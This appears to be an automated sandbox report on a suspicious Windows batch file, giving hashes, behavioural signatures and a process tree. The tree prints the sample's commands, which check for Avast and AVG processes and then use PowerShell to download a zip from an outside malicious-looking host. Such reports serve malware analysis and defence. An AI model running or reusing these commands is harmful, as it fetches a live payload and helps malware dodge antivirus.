Analysis
-
max time kernel
240s -
max time network
244s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
22-11-2024 02:01
Static task
static1
Behavioral task
behavioral1
Sample
22112024_0201_new.bat
Resource
win7-20241010-en
windows7-x64
5 signatures
300 seconds
General
-
Target
22112024_0201_new.bat
-
Size
3KB
-
MD5
58ce685ec1ce8644306dc4906242dcb7
-
SHA1
2f9dc4432e1d211e54aab97831fc3b0df5e86df2
-
SHA256
5ecc7f700bde0ab833e9a955d8ad371fab96e5a8c52d148488201e7815973725
-
SHA512
249ea3b3477cda22985e504f2a028ef370cc06fc4bd6655a7d18ecb26e0329e981720ccf234932e155b70a99131b95a62f8324ebcabe3652ec3b5c0c23fd0186
Malware Config
Signatures
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 2912 tasklist.exe 2368 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2160 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
tasklist.exetasklist.exepowershell.exedescription pid process Token: SeDebugPrivilege 2368 tasklist.exe Token: SeDebugPrivilege 2912 tasklist.exe Token: SeDebugPrivilege 2160 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.exedescription pid process target process PID 1688 wrote to memory of 2368 1688 cmd.exe tasklist.exe PID 1688 wrote to memory of 2368 1688 cmd.exe tasklist.exe PID 1688 wrote to memory of 2368 1688 cmd.exe tasklist.exe PID 1688 wrote to memory of 2224 1688 cmd.exe find.exe PID 1688 wrote to memory of 2224 1688 cmd.exe find.exe PID 1688 wrote to memory of 2224 1688 cmd.exe find.exe PID 1688 wrote to memory of 2912 1688 cmd.exe tasklist.exe PID 1688 wrote to memory of 2912 1688 cmd.exe tasklist.exe PID 1688 wrote to memory of 2912 1688 cmd.exe tasklist.exe PID 1688 wrote to memory of 2956 1688 cmd.exe find.exe PID 1688 wrote to memory of 2956 1688 cmd.exe find.exe PID 1688 wrote to memory of 2956 1688 cmd.exe find.exe PID 1688 wrote to memory of 2160 1688 cmd.exe powershell.exe PID 1688 wrote to memory of 2160 1688 cmd.exe powershell.exe PID 1688 wrote to memory of 2160 1688 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\22112024_0201_new.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq AvastUI.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Windows\system32\find.exefind /i "AvastUI.exe"2⤵PID:2224
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq avgui.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
C:\Windows\system32\find.exefind /i "avgui.exe"2⤵PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://funfagamlkdreceipgroup.top:8822/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160
-